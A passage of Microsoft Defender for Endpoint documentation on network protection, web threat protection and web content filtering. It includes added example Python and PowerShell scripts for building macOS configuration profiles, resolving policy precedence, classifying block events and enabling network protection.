<key>enforcementLevel</key>
<string>block</string>
</dict>
</dict>
</array>
</dict>
</plist>

2. Verify that the file is well-formed. From the Terminal, run the following
command and verify that it outputs OK:

Bash

plutil -lint com.microsoft.wdav.xml.mobileconfig
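
The profile above can also be generated rather than hand-edited. The following Python script is an added example, not Microsoft's tooling: it builds the same com.microsoft.wdav payload used in the JAMF plist and the mobileconfig above with the standard library's plistlib, validates the enforcement level (audit, block or disabled) before anything is written, generates fresh PayloadUUID values for each profile instead of reusing the sample's, and parses the result back to confirm which level a device would receive. The payload keys, the com.microsoft.wdav payload type and the networkProtection/enforcementLevel setting are from the page; the organization name, display strings and function names are the example's own choices.

```python
"""Build and check a Defender for Endpoint macOS network-protection profile.

Added example, not Microsoft's own tooling. It reproduces the payload
structure shown in the JAMF and mobileconfig sections with plistlib so the
enforcement level is validated, the PayloadUUIDs are freshly generated, and
the written profile is parsed back before it is handed to an MDM.
"""
import plistlib
import uuid
from typing import Any, Dict

# Enforcement levels the page documents for network protection on macOS.
ENFORCEMENT_LEVELS = ("audit", "block", "disabled")
PAYLOAD_TYPE = "com.microsoft.wdav"  # preference domain JAMF/Intune expect


def build_profile(enforcement_level: str, organization: str = "Contoso") -> bytes:
    """Return the XML bytes of a .mobileconfig that sets the enforcement level.

    'organization' and the display strings are this example's own values."""
    if enforcement_level not in ENFORCEMENT_LEVELS:
        raise ValueError(
            f"enforcement level must be one of {ENFORCEMENT_LEVELS}, got {enforcement_level!r}"
        )
    # Inner payload: the com.microsoft.wdav settings with networkProtection nested inside.
    settings: Dict[str, Any] = {
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadType": PAYLOAD_TYPE,
        "PayloadOrganization": organization,
        "PayloadIdentifier": PAYLOAD_TYPE,
        "PayloadDisplayName": "Microsoft Defender for Endpoint configuration settings",
        "PayloadDescription": "",
        "PayloadVersion": 1,
        "PayloadEnabled": True,
        "networkProtection": {"enforcementLevel": enforcement_level},
    }
    # Outer envelope: a system-scoped configuration profile users cannot remove.
    profile: Dict[str, Any] = {
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadType": "Configuration",
        "PayloadOrganization": organization,
        "PayloadIdentifier": PAYLOAD_TYPE,
        "PayloadDisplayName": "Microsoft Defender for Endpoint settings",
        "PayloadDescription": "Microsoft Defender for Endpoint configuration settings",
        "PayloadVersion": 1,
        "PayloadEnabled": True,
        "PayloadRemovalDisallowed": True,
        "PayloadScope": "System",
        "PayloadContent": [settings],
    }
    return plistlib.dumps(profile, fmt=plistlib.FMT_XML)


def read_enforcement_level(profile: bytes) -> str:
    """Parse a profile back (the check `plutil -lint` performs, plus a content
    check) and return the enforcement level its com.microsoft.wdav payload carries."""
    data = plistlib.loads(profile)
    for payload in data.get("PayloadContent", []):
        if payload.get("PayloadType") == PAYLOAD_TYPE:
            level = payload["networkProtection"]["enforcementLevel"]
            if level not in ENFORCEMENT_LEVELS:
                raise ValueError(f"profile carries unknown enforcement level {level!r}")
            return level
    raise ValueError(f"no {PAYLOAD_TYPE} payload in profile")


if __name__ == "__main__":
    import sys

    level = sys.argv[1] if len(sys.argv) > 1 else "block"
    xml = build_profile(level)
    with open("com.microsoft.wdav.xml.mobileconfig", "wb") as fh:
        fh.write(xml)
    print("wrote com.microsoft.wdav.xml.mobileconfig with enforcement level",
          read_enforcement_level(xml))
```

Saved as, say, build_np_profile.py and run with `python3 build_np_profile.py audit`, it writes a profile for an audit-mode pilot device group; lint it with plutil as in step 2, upload it to your MDM, and rerun with `block` once the pilot shows no broken workflows. Generating the UUIDs per profile matters because MDMs key on PayloadUUID, and two tenants pushing the sample's identical UUIDs is a common cause of a profile silently failing to apply.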

How to explore the features

1. Learn how to Protect your organization against web threats using web threat
protection.

Web threat protection is part of web protection in Microsoft Defender for
Endpoint. It uses network protection to secure your devices against web
threats.

2. Run through the Custom Indicators of Compromise flow to get blocks on the
Custom Indicator type.

3. Explore Web content filtering.

7 Note

If you are removing a policy or changing device groups at the same time, this
might cause a delay in policy deployment. Pro tip: You can deploy a policy
without selecting any category on a device group. This action will create an
audit only policy, to help you understand user behavior before creating a
block policy.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan
2.

4. Integrate Microsoft Defender for Endpoint with Defender for Cloud Apps and your
network protection-enabled macOS devices have endpoint policy enforcement
capabilities.

7 Note

Discovery and other features are currently not supported on these platforms.

Scenarios
The following scenarios are supported.

Web threat protection

Web threat protection is part of web protection in Microsoft Defender for Endpoint.
It uses network protection to secure your devices against web threats. By integrating
with Microsoft Edge for macOS and popular non-Microsoft browsers, such as Chrome
and Firefox, web threat protection stops web threats without a web proxy. Web threat
protection can protect devices while they're on premises or away. Web threat protection
stops access to the following types of sites:

phishing sites
malware vectors
exploit sites
untrusted or low-reputation sites
sites that are blocked in your custom indicator list


For more information, see Protect your organization against web threat

Custom Indicators of Compromise

Indicator of compromise (IoCs) matching is an essential feature in every endpoint
protection solution. This capability gives SecOps the ability to set a list of indicators for
detection and for blocking (prevention and response).

Create indicators that define the detection, prevention, and exclusion of entities. You can
define the action to be taken as well as the duration for when to apply the action and
the scope of the device group to apply it to.

Currently supported sources are the cloud detection engine of Defender for Endpoint,
the automated investigation and remediation engine, and the endpoint prevention
engine (Microsoft Defender Antivirus).

For more information, see: Create indicators for IPs and URLs/domains.

Web content filtering

Web content filtering is part of the Web protection capabilities in Microsoft Defender for
Endpoint and Microsoft Defender for Business. Web content filtering enables your
organization to track and regulate access to websites based on their content categories.
Many of these websites (even if they're not malicious) might be problematic because of
compliance regulations, bandwidth usage, or other concerns.

Configure policies across your device groups to block certain categories. Blocking a
category prevents users within specified device groups from accessing URLs associated
with the category. For any category that's not blocked, the URLs are automatically
audited. Your users can access the URLs without disruption, and you gather access
statistics to help create a more custom policy decision. Your users see a block
notification if an element on the page they're viewing is making calls to a blocked
resource.

Web content filtering is available on the major web browsers, with blocks performed by
Network Protection (Safari, Chrome, Firefox, Brave, and Opera). For more information
about browser support, see Prerequisites.

For more information about reporting, see Web content filtering.

Microsoft Defender for Cloud Apps

The Microsoft Defender for Cloud Apps Cloud App Catalog identifies apps that you want
end users to be warned about when accessing them through Microsoft Defender for
Endpoint; mark those apps as Monitored. The domains listed under monitored apps are
later synced to Microsoft Defender for Endpoint:

Within 10-15 minutes, these domains are listed in Microsoft Defender XDR under
Indicators > URLs/Domains with Action=Warn. Within the enforcement SLA (see details
at the end of this article), end users get warn messages when attempting to
access these domains:

When the end user attempts to access a monitored domain, they're warned by
Defender for Endpoint.

The user gets a plain block experience accompanied by a toast message, which is
displayed by the operating system and includes the name of the blocked
application (for example, Blogger.com).

If the end user encounters a block, the user has two possible resolutions:

User bypass
For toast message experience: Press the Unblock button. By reloading the
webpage, the user is able to proceed and use the cloud app. (This action is
applicable for the next 24 hours, after which the user has to unblock once again)

User education
For toast message experience: Press the toast message itself. End user is
redirected to a custom redirect URL set globally in Microsoft Defender for Cloud
Apps (More information at the bottom of this page)

7 Note

Tracking bypasses per app: You can track how many users have bypassed the
warning in the Application page in Microsoft Defender for Cloud Apps.

Appendix

End user education center SharePoint site template

For many organizations, it's important to take the cloud controls provided by Microsoft
Defender for Cloud Apps, and to not only set limitations on end users when needed, but
to also educate and coach them about:

the specific incident
why it has happened
what is the thinking behind this decision
how encountering block sites can be mitigated

Upon facing an unexpected behavior, users' confusion might be reduced by providing
them as much information as possible, not only to explain what has happened
but to also educate them to be more aware the next time they choose a cloud app to
complete their job. For example, this information can include:

Organization security and compliance policies and guidelines for internet and
cloud use
Approved/recommended cloud apps for use
Restricted/blocked cloud apps for use

For this page, we recommend that your organization uses a basic SharePoint site.

Important things to know

1. It can take up to two hours (typically less) for app domains to propagate and to be
updated on the endpoint devices after they're marked as Monitored.
2. By default, action is taken for all apps and domains that were marked as Monitored
in the Microsoft Defender for Cloud Apps portal for all the onboarded endpoints in the
organization.
3. Full URLs are currently not supported and won't be sent from Microsoft Defender
for Cloud Apps to Microsoft Defender for Endpoint. If any full URLs are listed
under Microsoft Defender for Cloud Apps monitored apps, the user won't get
warned on an access attempt (for example, google.com/drive isn't supported, while
drive.google.com is supported).

No end-user notification on third-party browsers? Check your toast message settings.

See also
Microsoft Defender for Endpoint on Mac
Microsoft Defender for Endpoint integration with Microsoft Defender for Cloud Apps
Get to know the innovative features in Microsoft Edge
Protect your network
Turn on network protection
Web protection
Create indicators
Web content filtering


Web protection
Article • 12/16/2022

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

About web protection

Web protection in Microsoft Defender for Endpoint is a capability made up of Web
threat protection, Web content filtering, and Custom indicators. Web protection lets you
secure your devices against web threats and helps you regulate unwanted content. You
can find Web protection reports in the Microsoft Defender portal by going to Reports >
Web protection.

Web threat protection

The cards that make up web threat protection are Web threat detections over time and
Web threat summary.

Web threat protection includes:

Comprehensive visibility into web threats affecting your organization.
Investigation capabilities over web-related threat activity through alerts and
comprehensive profiles of URLs and the devices that access these URLs.
A full set of security features that track general access trends to malicious and
unwanted websites.

7 Note

For processes other than Microsoft Edge and Internet Explorer, web protection
scenarios leverage Network Protection for inspection and enforcement:

IP is supported for all three protocols (TCP, HTTP, and HTTPS (TLS)).
Only single IP addresses are supported (no CIDR blocks or IP ranges) in
custom indicators.
Encrypted URLs (full path) can only be blocked on first party browsers
(Internet Explorer, Edge).
Encrypted URLs (FQDN only) can be blocked in third party browsers (i.e. other
than Internet Explorer, Edge).
Full URL path blocks can be applied for unencrypted URLs.

There may be up to 2 hours of latency (usually less) between the time the action is
taken, and the URL and IP being blocked.

For more information, see Web threat protection.

Custom indicators
Custom indicator detections are also summarized in your organizations web threat
reports under Web threat detections over time and Web threat summary.

Custom indicator includes:

Ability to create IP and URL-based indicators of compromise to protect your
organization against threats.
Investigation capabilities over activities related to your custom IP/URL profiles and
the devices that access these URLs.
The ability to create Allow, Block, and Warn policies for IPs and URLs.

For more information, see Create indicators for IPs and URLs/domains

Web content filtering

Web content filtering includes Web activity by category, Web content filtering
summary, and Web activity summary.

Web content filtering includes:

Users are prevented from accessing websites in blocked categories, whether they
are browsing on-premises or away.
You can conveniently deploy varied policies to various sets of users using the
device groups defined in the Microsoft Defender for Endpoint role-based access
control settings.

7 Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan
2.

You can access web reports in the same central location, with visibility over actual
blocks and web usage.

For more information, see Web content filtering.

Order of precedence
Web protection is made up of the following components, listed in order of precedence.
Each of these components is enforced by the SmartScreen client in Microsoft Edge and
by the Network Protection client in all other browsers and processes.

Custom indicators (IP/URL, Microsoft Defender for Cloud Apps policies)
    Allow
    Warn
    Block

Web threats (malware, phish)
    SmartScreen Intel, including Exchange Online Protection (EOP)
    Escalations

Web Content Filtering (WCF)

7 Note

Microsoft Defender for Cloud Apps currently generates indicators only for blocked
URLs.

The order of precedence relates to the order of operations by which a URL or IP is
evaluated. For example, if you have a web content filtering policy, you can create
exclusions through custom IP/URL indicators. Custom Indicators of compromise (IoC)
are higher in the order of precedence than WCF blocks.

Similarly, during a conflict between indicators, allows always take precedence over
blocks (override logic). That means that an allow indicator will win over any block
indicator that is present.

The table below summarizes some common configurations that would present conflicts
within the web protection stack. It also identifies the resulting determinations based on
the precedence listed above.

Custom Indicator policy | Web threat policy | WCF policy | Defender for Cloud Apps policy | Result
Allow                   | Block             | Block      | Block                          | Allow (Web protection override)
Allow                   | Allow             | Block      | Block                          | Allow (WCF exception)
Warn                    | Block             | Block      | Block                          | Warn (override)

Internal IP addresses are not supported by custom indicators. For a warn policy when
bypassed by the end user, the site will be unblocked for 24 hours for that user by
default. This time frame can be modified by the Admin and is passed down by the
SmartScreen cloud service. The ability to bypass a warning can also be disabled in
Microsoft Edge using CSP for web threat blocks (malware/phishing). For more
information, see Microsoft Edge SmartScreen Settings.
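
To make the precedence and override rules concrete, here is an added example (not Microsoft's code) that encodes them as a small resolver and replays the rows of the conflict table. Each argument is the verdict one feature's policy would return on its own; None means that feature has no policy for the destination. Defender for Cloud Apps policies are delivered as custom indicators, so they sit in the first tier. The allow > warn > block ranking within that tier is this example's reading of the order in which the page lists the actions, and the source labels and function names are the example's own.

```python
"""Resolve the web protection verdict for one URL or IP address.

Added example, not Microsoft's code. It encodes the order of precedence
described above (custom indicators, then web threats, then web content
filtering) and the rule that allows override blocks, so the conflict table
can be checked mechanically.
"""
from typing import Dict, Optional, Tuple

ACTIONS = ("allow", "warn", "block")
# Lower rank wins when several indicators match the same destination:
# "allows always take precedence over blocks". The warn-over-block step is
# this example's reading of the order the page lists the actions in.
RANK = {"allow": 0, "warn": 1, "block": 2}
TIER1 = ("custom indicator", "Defender for Cloud Apps")

# (action, feature that decided, features whose block was overridden)
Verdict = Tuple[str, str, Tuple[str, ...]]


def resolve(custom_indicator: Optional[str] = None,
            web_threat: Optional[str] = None,
            wcf: Optional[str] = None,
            cloud_apps: Optional[str] = None) -> Verdict:
    """Consult the tiers in order of precedence. The first tier with an
    opinion decides and later tiers are never reached; that is exactly how a
    custom allow indicator becomes a WCF exception."""
    policies: Dict[str, Optional[str]] = {
        "custom indicator": custom_indicator,
        "Defender for Cloud Apps": cloud_apps,  # delivered as custom indicators
        "web threat": web_threat,
        "WCF": wcf,
    }
    for name, value in policies.items():
        if value is not None and value not in ACTIONS:
            raise ValueError(f"{name}: expected one of {ACTIONS} or None, got {value!r}")

    tier1 = {n: v for n, v in policies.items() if n in TIER1 and v is not None}
    if tier1:
        # Tier 1: custom indicators. Within the tier, allow beats warn beats block.
        source, action = min(tier1.items(), key=lambda item: RANK[item[1]])
    elif web_threat is not None:
        # Tier 2: SmartScreen intelligence, EOP, escalations.
        source, action = "web threat", web_threat
    elif wcf is not None:
        # Tier 3: web content filtering category policy.
        source, action = "WCF", wcf
    else:
        # No policy matched: the request is permitted (and, for WCF, only audited).
        return "allow", "no policy", ()

    # Report the block decisions the winner overrode, as the conflict table does.
    overridden = tuple(n for n, v in policies.items()
                       if v == "block" and n != source and action != "block")
    return action, source, overridden


# The three rows of the conflict table above, plus cases without a conflict.
TABLE = [
    (dict(custom_indicator="allow", web_threat="block", wcf="block", cloud_apps="block"), "allow"),
    (dict(custom_indicator="allow", web_threat="allow", wcf="block", cloud_apps="block"), "allow"),
    (dict(custom_indicator="warn", web_threat="block", wcf="block", cloud_apps="block"), "warn"),
    (dict(web_threat="block", wcf="block"), "block"),
    (dict(wcf="block"), "block"),
    (dict(), "allow"),
]


def check_table() -> bool:
    """True when resolve() reproduces every row of TABLE."""
    return all(resolve(**policies)[0] == expected for policies, expected in TABLE)


if __name__ == "__main__":
    for policies, expected in TABLE:
        action, source, overridden = resolve(**policies)
        flag = "" if action == expected else "  MISMATCH"
        print(f"{policies} -> {action} (by {source}; overrode {overridden or 'nothing'}){flag}")
```

The practical consequence the resolver makes visible is that an allow indicator is a global exception: it suppresses web threat blocks (SmartScreen intelligence included), WCF category blocks and Cloud Apps blocks alike, so allow indicators deserve the same change control as firewall exceptions.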

Protect browsers
In all web protection scenarios, SmartScreen and Network Protection can be used
together to ensure protection across both first and third-party browsers and processes.
SmartScreen is built directly into Microsoft Edge, while Network Protection monitors
traffic in third-party browsers and processes. The diagram below illustrates this concept.
This diagram of the two clients working together to provide multiple browser/app
coverages is accurate for all features of Web Protection (Indicators, Web Threats,
Content Filtering).

Troubleshoot endpoint blocks

Responses from the SmartScreen cloud are standardized. Tools like Fiddler can be used
to inspect the response from the cloud service, which will help determine the source of
the block.

When the SmartScreen cloud service responds with an allow, block, or warn response, a
response category and server context is relayed back to the client. In Microsoft Edge, the
response category is what is used to determine the appropriate block page to show
(malicious, phishing, organizational policy).

The table below shows the responses and their correlated features.

ResponseCategory Feature responsible for the block

CustomPolicy WCF

CustomBlockList Custom indicators

CasbPolicy Defender for Cloud Apps

Malicious Web threats

Phishing Web threats

Advanced hunting for web protection

Kusto queries in advanced hunting can be used to summarize web protection blocks in
your organization for up to 30 days. These queries use the information listed above to
distinguish between the various sources of blocks and summarize them in a user-
friendly manner. For example, the query below lists all WCF blocks originating from
Microsoft Edge.

Kusto

DeviceEvents
| where ActionType == "SmartScreenUrlWarning"
| extend ParsedFields=parse_json(AdditionalFields)
| project DeviceName, ActionType, Timestamp, RemoteUrl,
InitiatingProcessFileName, Experience=tostring(ParsedFields.Experience)
| where Experience == "CustomPolicy"

Similarly, the query below lists all WCF blocks originating from network protection (for
example, a WCF block in a third-party browser). Note that the ActionType differs, and the
parsed field is named ResponseCategory rather than Experience.

Kusto

DeviceEvents
| where ActionType == "ExploitGuardNetworkProtectionBlocked"
| extend ParsedFields=parse_json(AdditionalFields)
| project DeviceName, ActionType, Timestamp, RemoteUrl,
InitiatingProcessFileName,
ResponseCategory=tostring(ParsedFields.ResponseCategory)
| where ResponseCategory == "CustomPolicy"

To list blocks that are due to other features (such as custom indicators), substitute the
response category from the table above. These queries can also be narrowed to specific
devices in your organization. Note that the ActionType values used in each query return
only connections that were blocked by a web protection feature, not all network traffic.
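The two queries above differ only in the event type and in the name of the parsed field. As an added example that is not part of the Microsoft article, the following PowerShell applies the same classification to rows exported from advanced hunting (for example, a CSV export of DeviceEvents) so that blocks from both paths can be summarized together by source and by responsible feature. The mapping is the table above; the sample rows are constructed for illustration and are not real telemetry.

```powershell
# Added example (not from the Microsoft article). Classifies exported web
# protection events by the feature responsible for the block, following the
# ResponseCategory table in the article, and summarizes them by source.
# Expected input: rows with the columns Timestamp, DeviceName, ActionType,
# InitiatingProcessFileName, RemoteUrl and AdditionalFields (JSON string),
# as produced by an advanced hunting CSV export of the DeviceEvents table.

# Response category -> feature, from the article's table.
$ResponseCategoryToFeature = @{
    'CustomPolicy'    = 'Web content filtering (WCF)'
    'CustomBlockList' = 'Custom indicators'
    'CasbPolicy'      = 'Defender for Cloud Apps'
    'Malicious'       = 'Web threats'
    'Phishing'        = 'Web threats'
}

function Get-WebProtectionBlockSource {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)] [object]$Row)
    process {
        $fields = $null
        if ($Row.AdditionalFields) {
            try { $fields = $Row.AdditionalFields | ConvertFrom-Json } catch { }
        }

        # Edge (SmartScreen) events carry the category in 'Experience';
        # network protection events carry it in 'ResponseCategory'.
        switch ($Row.ActionType) {
            'SmartScreenUrlWarning' {
                $source   = 'SmartScreen (Microsoft Edge)'
                $category = if ($fields) { $fields.Experience } else { $null }
            }
            'ExploitGuardNetworkProtectionBlocked' {
                $source   = 'Network protection'
                $category = if ($fields) { $fields.ResponseCategory } else { $null }
            }
            default {
                # Any other ActionType is not a web protection block.
                $source   = 'Other'
                $category = $null
            }
        }

        $feature = if ($category -and $ResponseCategoryToFeature.ContainsKey([string]$category)) {
            $ResponseCategoryToFeature[[string]$category]
        } else { 'Unknown' }

        [pscustomobject]@{
            Timestamp  = $Row.Timestamp
            DeviceName = $Row.DeviceName
            Process    = $Row.InitiatingProcessFileName
            RemoteUrl  = $Row.RemoteUrl
            Source     = $source
            Category   = $category
            Feature    = $feature
        }
    }
}

# Constructed sample rows standing in for an export (not real telemetry).
$sampleRows = @'
[
 {"Timestamp":"2024-02-01T09:12:00Z","DeviceName":"ws01","ActionType":"SmartScreenUrlWarning",
  "InitiatingProcessFileName":"msedge.exe","RemoteUrl":"https://gambling.example/",
  "AdditionalFields":"{\"Experience\":\"CustomPolicy\"}"},
 {"Timestamp":"2024-02-01T09:15:00Z","DeviceName":"ws01","ActionType":"ExploitGuardNetworkProtectionBlocked",
  "InitiatingProcessFileName":"chrome.exe","RemoteUrl":"https://gambling.example/",
  "AdditionalFields":"{\"ResponseCategory\":\"CustomPolicy\"}"},
 {"Timestamp":"2024-02-01T10:02:00Z","DeviceName":"ws02","ActionType":"ExploitGuardNetworkProtectionBlocked",
  "InitiatingProcessFileName":"firefox.exe","RemoteUrl":"https://bad.example/login",
  "AdditionalFields":"{\"ResponseCategory\":\"Phishing\"}"},
 {"Timestamp":"2024-02-01T10:30:00Z","DeviceName":"ws03","ActionType":"SmartScreenUrlWarning",
  "InitiatingProcessFileName":"msedge.exe","RemoteUrl":"https://blocked.example/",
  "AdditionalFields":"{\"Experience\":\"CustomBlockList\"}"}
]
'@ | ConvertFrom-Json

# With real data: $rows = Import-Csv .\DeviceEvents-export.csv
$classified = $sampleRows | Get-WebProtectionBlockSource

$classified |
    Group-Object Source, Feature |
    Sort-Object Count -Descending |
    Select-Object Count, Name |
    Format-Table -AutoSize
```

Rows whose category is missing or not in the table come out as Unknown rather than being dropped, so a new response category introduced by the service shows up in the summary instead of silently disappearing.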

User experience

If a user visits a web page that poses a risk of malware, phishing, or other web threats,
Microsoft Edge shows a block page that reads 'This site has been reported as unsafe', along
with information about the threat.

If the block comes from WCF or a custom indicator, Microsoft Edge shows a block page that
tells the user the site is blocked by their organization.

Third-party browsers never show a block page. Instead, the user sees a 'Secure Connection
Failed' page in the browser along with a toast notification from Windows. The message in
the toast depends on the policy responsible for the block; for example, web content
filtering displays 'This content is blocked'.

Report false positives

To report a false positive for a site that SmartScreen has deemed dangerous, use the link
that appears on the block page in Microsoft Edge.

For WCF, you can dispute the category of a domain. Navigate to the Domains tab of the WCF
reports. An ellipsis appears beside each domain; hover over it and select Dispute Category.
In the flyout that opens, set the priority of the incident and provide additional details,
such as the suggested category. For more information on how to turn on WCF and how to
dispute categories, see Web content filtering.

For more information on how to submit false positives/negatives, see Address false
positives/negatives in Microsoft Defender for Endpoint.

Related information

Topic                    Description
Web threat protection    Stop access to phishing sites, malware vectors, exploit sites, untrusted or
                         low-reputation sites, and sites that you have blocked.
Web content filtering    Track and regulate access to websites based on their content categories.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Protect your organization against web threats
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR


Web threat protection is part of Web protection in Defender for Endpoint. It uses network
protection to secure your devices against web threats. By integrating with Microsoft Edge
and popular third-party browsers like Chrome and Firefox, web threat protection stops web
threats without a web proxy and can protect devices whether they're on premises or away.
Web threat protection stops access to phishing sites, malware vectors, exploit sites,
untrusted or low-reputation sites, and sites that you've blocked through your custom
indicator list.

Note

It might take up to two hours for devices to receive new custom indicators.

Prerequisites

Web protection uses network protection to provide web browsing security on Microsoft
Edge and non-Microsoft web browsers.

To turn on network protection on your devices, do one of the following:

- Edit the Defender for Endpoint security baseline under Web & Network Protection to
  enable network protection before deploying or redeploying it. Learn about reviewing and
  assigning the Defender for Endpoint security baseline.
- Turn network protection on using Intune device configuration, Configuration Manager
  (SCCM), Group Policy, or your MDM solution. Read more about enabling network protection.

Note

If you set network protection to audit mode only, blocking is unavailable. In audit mode,
attempts to access malicious and unwanted websites are detected and logged for Microsoft
Edge only.

Configure web threat protection

The following procedure describes how to configure web threat protection using the
Microsoft Intune admin center.

1. Go to the Microsoft Intune admin center (https://endpoint.microsoft.com), and sign in.

2. Choose Endpoint security > Attack surface reduction, and then choose + Create policy.

3. Select a platform, such as Windows 10 and later, select the Web protection profile,
   and then choose Create.

4. On the Basics tab, specify a name and description, and then choose Next.

5. On the Configuration settings tab, expand Web Protection, specify your settings,
   and then choose Next.

   - Set Enable network protection to Enabled so web protection is turned on.
     Alternately, you can set network protection to Audit mode to see how it works in
     your environment. In audit mode, network protection doesn't prevent users from
     visiting sites or domains, but it does track detections as events.
   - To protect users from potential phishing scams and malicious software, set
     Require SmartScreen for Microsoft Edge Legacy to Yes.
   - To prevent users from bypassing warnings about potentially malicious sites, set
     Block malicious site access to Yes.
   - To prevent users from bypassing the warnings and downloading unverified files, set
     Block unverified file download to Yes.

6. On the Scope tags tab, if your organization is using scope tags, choose + Select
   scope tags, and then choose Next. (If you aren't using scope tags, choose Next.) To
   learn more about scope tags, see Use role-based access control (RBAC) and scope tags
   for distributed IT.

7. On the Assignments tab, specify the users and devices to receive the web protection
   policy, and then choose Next.

8. On the Review + create tab, review your policy settings, and then choose Create.
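Before assigning the Intune profile broadly, it's common to stage the network protection setting on a single onboarded test device and confirm its state locally. The following PowerShell is an added example that is not from the Microsoft article. It uses the Set-MpPreference, Get-MpPreference and Get-MpComputerStatus cmdlets from the Windows Defender module to move network protection from audit mode to block mode and to read back the result; run it in an elevated session. Once the Intune profile applies to the device, its setting takes precedence over the local one.

```powershell
# Added example (not from the Microsoft article): stage network protection on
# one device before deploying the Intune web protection profile. Run elevated.

function Set-NetworkProtectionMode {
    param(
        [Parameter(Mandatory)]
        [ValidateSet('Disabled', 'Enabled', 'AuditMode')]
        [string]$Mode
    )
    # This is the same setting the Intune "Enable network protection" option controls.
    Set-MpPreference -EnableNetworkProtection $Mode

    # On Windows Server the feature must additionally be allowed explicitly.
    # Win32_OperatingSystem.ProductType: 1 = workstation, 2 = domain controller, 3 = server.
    $productType = (Get-CimInstance -ClassName Win32_OperatingSystem).ProductType
    if ($productType -ne 1) {
        Set-MpPreference -AllowNetworkProtectionOnWinServer $true
    }
}

function Get-NetworkProtectionState {
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    # EnableNetworkProtection is stored as a number: 0, 1 or 2.
    $modes  = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode' }

    [pscustomobject]@{
        NetworkProtection    = $modes[[int]$pref.EnableNetworkProtection]
        # Network protection relies on real-time protection being on.
        RealTimeProtection   = $status.RealTimeProtectionEnabled
        BehaviorMonitoring   = $status.BehaviorMonitorEnabled
        # MAPSReporting 0 means cloud-delivered protection is off.
        CloudProtectionLevel = $pref.MAPSReporting
        PlatformVersion      = $status.AMProductVersion
    }
}

# 1. Observe first: audit mode logs detections without blocking.
Set-NetworkProtectionMode -Mode AuditMode
Get-NetworkProtectionState

# 2. After reviewing the audit events in advanced hunting, enforce blocking.
Set-NetworkProtectionMode -Mode Enabled
Get-NetworkProtectionState
```

If Get-NetworkProtectionState reports NetworkProtection as Enabled but RealTimeProtection is False, blocks will not happen; fix real-time protection first rather than troubleshooting the web protection policy.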

Related articles
Web protection overview
Web threat protection
Monitor web security
Respond to web threats
Network protection


Monitor web browsing security
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR


Web protection lets you monitor your organization's web browsing security through
reports under Reports > Web protection in the Microsoft Defender portal. The report
contains cards that provide web threat detection statistics.

Web threat protection detections over time - this trending card displays the
number of web threats detected by type during the selected time period (Last 30
days, Last 3 months, Last 6 months)

Web threat protection summary - this card displays the total web threat
detections in the past 30 days, showing distribution across the different types of
web threats. Selecting a slice opens the list of the domains that were found with
malicious or unwanted websites.

Note

It can take up to 12 hours before a block is reflected in the cards or the domain list.

Types of web threats

Web protection categorizes malicious and unwanted websites as:

- Phishing - websites that contain spoofed web forms and other phishing mechanisms
  designed to trick users into divulging credentials and other sensitive information
- Malicious - websites that host malware and exploit code
- Custom indicator - websites whose URLs or domains you've added to your custom
  indicator list for blocking

View the domain list

Select a specific web threat category in the Web threat protection summary card to open
the Domains page. This page displays the list of the domains under that threat category.
The page provides the following information for each domain:

- Access count - number of requests for URLs in the domain
- Blocks - number of times requests were blocked
- Access trend - change in number of access attempts
- Threat category - type of web threat
- Devices - number of devices with access attempts

Select a domain to view the list of devices that have attempted to access URLs in that
domain and the list of URLs.

Related topics
Web protection overview
Web content filtering
Web threat protection
Respond to web threats


Respond to web threats
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR


Web protection in Microsoft Defender for Endpoint lets you efficiently investigate and
respond to alerts related to malicious websites and websites in your custom indicator
list.

View web threat alerts

Microsoft Defender for Endpoint generates the following alerts for malicious or suspicious
web activity:

- Suspicious connection blocked by network protection: generated when network protection
  (in block mode) stops an attempt to access a malicious website or a website in your
  custom indicator list.
- Suspicious connection detected by network protection: generated when network protection
  (in audit mode) detects an attempt to access a malicious website or a website in your
  custom indicator list.

Each alert provides the following information:

- Device that attempted to access the blocked website
- Application or program used to send the web request
- Malicious URL or URL in the custom indicator list
- Recommended actions for responders

Note

To reduce the volume of alerts, Microsoft Defender for Endpoint consolidates web threat
detections for the same domain on the same device each day into a single alert. Only one
alert is generated and counted in the web protection report.

Inspect website details

You can dive deeper by selecting the URL or domain of the website in the alert. This opens
a page about that particular URL or domain with various information, including:

- Devices that attempted to access the website
- Incidents and alerts related to the website
- How frequently the website was seen in events in your organization

For more information, see About URL or domain entity pages.


Inspect the device
You can also check the device that attempted to access a blocked URL. Selecting the
name of the device on the alert page opens a page with comprehensive information
about the device.

For more information, see About device entity pages.

Web browser and Windows notifications for end users

With web protection in Defender for Endpoint, your end users are prevented from visiting
malicious or unwanted websites in Microsoft Edge or other browsers. In Microsoft Edge,
SmartScreen shows a block page. In other browsers the block is enforced by network
protection rather than by the browser itself, so users see a generic connection error from
the browser together with a notification from Windows.

Web threat blocked on Microsoft Edge

Web threat blocked on Chrome

Related articles
Web protection overview
Web content filtering
Web threat protection
Monitor web security


Web content filtering
Article • 02/02/2024

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

What is web content filtering?

Web content filtering is part of the Web protection capabilities in Microsoft Defender for
Endpoint and Microsoft Defender for Business. Web content filtering enables your
organization to track and regulate access to websites based on their content categories.
Many of these websites (even if they're not malicious) might be problematic because of
compliance regulations, bandwidth usage, or other concerns.

Configure policies across your device groups to block certain categories. Blocking a
category prevents users within specified device groups from accessing URLs associated
with the category. For any category that's not blocked, the URLs are automatically
audited. Your users can access the URLs without disruption, and you'll gather access
statistics to help create a more custom policy decision. Your users will see a block
